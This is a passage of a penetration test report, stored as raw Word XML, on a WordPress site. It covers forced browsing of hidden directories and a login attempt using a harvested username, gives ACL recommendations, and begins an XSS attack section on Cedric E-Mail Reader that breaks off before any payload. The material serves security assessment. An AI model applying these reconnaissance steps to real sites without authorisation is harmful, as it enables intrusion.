      <w:r w:rsidR="005703F6" w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> figure </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="005703F6" w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005703F6">
        <w:t>contains a sitemap.xml along with two directories to the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005703F6">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005703F6">
        <w:t>-admin/ WordPress control panel section of the website that is disallowed although the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005703F6">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005703F6">
        <w:t>-admin/admin-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005703F6">
        <w:t>ajax.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005703F6">
        <w:t xml:space="preserve"> file is allowed along with the sitemap.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E555F" w14:textId="77777777" w:rsidR="00195EE2" w:rsidRDefault="00E50E91" w:rsidP="00195EE2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D32D384" wp14:editId="6C81E72B">
            <wp:extent cx="3324531" cy="563880"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="266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r="73053"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3324531" cy="56388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4E66C8C" w14:textId="7F84988C" w:rsidR="00E50E91" w:rsidRPr="00195EE2" w:rsidRDefault="00195EE2" w:rsidP="00195EE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc40134075"/>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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Robots.txt File Found within Hidden Directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="052B3CDB" w14:textId="440B9FF3" w:rsidR="005703F6" w:rsidRPr="005703F6" w:rsidRDefault="005703F6" w:rsidP="005703F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005703F6">
        <w:t>Further investigation into the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>-admin/ yielded no usable information as the browser was redirected to the WordPress administrator control panel of the site. The /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>-admin-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>ajax.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve">/ would have been checked for a XSS vulnerability but unfortunately the security had been hardened at that point in time of the penetration test by the security engineers at tevelcyber.com that prevented all forced browser attacks within hidden directories and file in the website, so this possible XSS vulnerability was unable to be pursued further. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB41FF" w14:textId="416AEF07" w:rsidR="00A43CED" w:rsidRDefault="00A43CED" w:rsidP="00A43CED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Directory </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r w:rsidR="007E513C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /Sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAEF14B" w14:textId="6B66B3F5" w:rsidR="005703F6" w:rsidRPr="005703F6" w:rsidRDefault="005703F6" w:rsidP="00A43CED">
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve">As previously discussed the sitemap.xml file is utilised by </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="005703F6">
        <w:t>Web Crawle</w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t>rs</w:t>
      </w:r>
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve"> to display links to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005703F6">
        <w:t>companies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="005703F6">
        <w:t>webs</w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="005703F6">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve"> page within </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="005703F6">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidRPr="005703F6">
        <w:t xml:space="preserve"> search results shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13DE36" w14:textId="77777777" w:rsidR="00195EE2" w:rsidRDefault="007E513C" w:rsidP="00195EE2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C230C69" wp14:editId="3FB4DFF0">
            <wp:extent cx="5730240" cy="2377440"/>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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="34728"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="2377440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3A2FE" w14:textId="575E2325" w:rsidR="00A43CED" w:rsidRPr="00195EE2" w:rsidRDefault="00195EE2" w:rsidP="00195EE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc40134076"/>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11</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Sitemap.xml Located within a Hidden Directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="183D7250" w14:textId="3C1C87BA" w:rsidR="005703F6" w:rsidRPr="005703F6" w:rsidRDefault="005703F6" w:rsidP="005703F6">
      <w:r w:rsidRPr="005703F6">
        <w:t>The links within the sitemap.xml did not yield any further results within the investigation as expected because this file is utilised by website browsers to display information, so no security issues were found here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC554F4" w14:textId="2107E704" w:rsidR="005703F6" w:rsidRDefault="007E513C" w:rsidP="00E113EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Directory </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: -</w:t>
      </w:r>
      <w:r w:rsidR="00CD2DA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2DA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71DABBB7" w14:textId="474FAB94" w:rsidR="005703F6" w:rsidRPr="00541913" w:rsidRDefault="005703F6" w:rsidP="00E113EF">
      <w:r w:rsidRPr="00541913">
        <w:t>The /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541913">
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> page shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> was another portal to the control panel of </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> previously found within the backend </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> was applied but the correct password was not </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>issued</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> as further </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>investigation</w:t>
      </w:r>
      <w:r w:rsidRPr="00541913">
        <w:t xml:space="preserve"> into the </w:t>
      </w:r>
      <w:r w:rsidR="00541913" w:rsidRPr="00541913">
        <w:t>backend database files were halted on the clients request as previously discussed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F11561" w14:textId="77777777" w:rsidR="00195EE2" w:rsidRDefault="00CD2DA7" w:rsidP="00195EE2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547EDF47" wp14:editId="43EAD519">
            <wp:extent cx="5730240" cy="2509520"/>
            <wp:effectExtent l="0" t="0" r="381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2">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="23013" b="8089"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="2509520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="333AC5D9" w14:textId="61C1ECA3" w:rsidR="007E513C" w:rsidRPr="00195EE2" w:rsidRDefault="00195EE2" w:rsidP="00195EE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc40134077"/>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Secure WordPress Login Page Located within a Hidden Directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="37ACDEBA" w14:textId="7145F22F" w:rsidR="007E513C" w:rsidRPr="00CD2DA7" w:rsidRDefault="00CD2DA7" w:rsidP="00195EE2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD2DA7">
        <w:t>Due to the security of the target website being hardened along with the indefinite suspension of the website, the remaining found unsecure hidden directories were unable to be further investigated and exploited</w:t>
      </w:r>
      <w:r w:rsidR="0048101D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228FB26B" w14:textId="36671D94" w:rsidR="00587262" w:rsidRDefault="00587262" w:rsidP="00587262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc40134049"/>
      <w:r>
        <w:t>6.2.1.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6E766EC7" w14:textId="1B3D6553" w:rsidR="00BE64F8" w:rsidRDefault="00541913" w:rsidP="00541913">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recommendations to prevent forced browser attacks being leveraged against the target website are to manually create an Access Control List</w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t xml:space="preserve"> (ACL)</w:t>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B0288">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[117]","plainTextFormattedCitation":"[117]","previouslyFormattedCitation":"[117]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F4379" w:rsidRPr="007F4379">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[117]</w:t>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within the hidden directories to </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">prevent </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>unauthorised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access, also define the types of files that can be allowed to be read remotely using file extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE69374" w14:textId="5084C785" w:rsidR="00587262" w:rsidRPr="00587262" w:rsidRDefault="00541913" w:rsidP="00541913">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The files to include would be all </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files, spreadsheet file, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and log files. </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>Virtual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directories are also </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to partition </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t xml:space="preserve">directories that contain </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">highly sensitive information </w:t>
      </w:r>
      <w:r w:rsidR="00692E17">
        <w:t>from directories that do not contain sensitive information. This method allows for granular ACL to be utilised and managed through a simple control panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C746C08" w14:textId="1A511FD9" w:rsidR="00EF183F" w:rsidRDefault="0090297E" w:rsidP="00EF183F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc40134050"/>
      <w:r>
        <w:t>6.2.2 Attack 2</w:t>
      </w:r>
      <w:r w:rsidR="00C200A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00354E63">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00C200A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0080126E">
        <w:t>Isoka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0080126E">
        <w:t xml:space="preserve"> Cedric E-Mail Reader 0.4</w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="196164FF" w14:textId="11009628" w:rsidR="00EF183F" w:rsidRDefault="00B30CDC" w:rsidP="00EF183F">
      <w:r>
        <w:t xml:space="preserve">The PHP file that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found within the information gathering stage of the investigation was inspected via the source code after being downloaded using the</w:t>
      </w:r>
      <w:r w:rsidR="001520A9">
        <w:t xml:space="preserve"> Curl tool; [syntax; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001520A9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001520A9">
        <w:t xml:space="preserve"> curl -o </w:t>
      </w:r>
      <w:r w:rsidR="001520A9" w:rsidRPr="001520A9">
        <w:t>www.tevelcyber.com/webmail/lib/emailreader_execute_on_each_page.inc.php ./</w:t>
      </w:r>
      <w:r w:rsidR="001520A9">
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00BE64F8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081E1FC" w14:textId="77777777" w:rsidR="00BE64F8" w:rsidRDefault="00EF183F" w:rsidP="00BE64F8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000F467B">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="607EB704" wp14:editId="78400E49">
            <wp:extent cx="5730240" cy="2260600"/>
            <wp:effectExtent l="0" t="0" r="381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2260600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E9E9E" w14:textId="16FFD336" w:rsidR="00EF183F" w:rsidRPr="00BE64F8" w:rsidRDefault="00BE64F8" w:rsidP="00BE64F8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc40134078"/>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE64F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Suspicious PHP Page found with Possible XSS Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="42B05551" w14:textId="42C1AEA7" w:rsidR="00837FFD" w:rsidRDefault="00B30CDC" w:rsidP="00B30CDC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once the source</w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">code was inspected, it was evident that </w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t>there</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was a </w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve">known </w:t>
      </w:r>
      <w:r>
        <w:t>XSS vulnerability within the iframe suspiciously called ‘sandbox’ that contained a link to</w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve"> a known E-Mail application vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve"> Cedric E-Mail reader 4.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve">via the </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00501A2D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00501A2D" w:rsidRPr="00502A33">
        <w:t>emailreader_execute_on_each_page.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501A2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t>is a known</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118" w:rsidRPr="00AC7118">
        <w:t>CVE-2003-1411</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve"> that contains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00502A33">
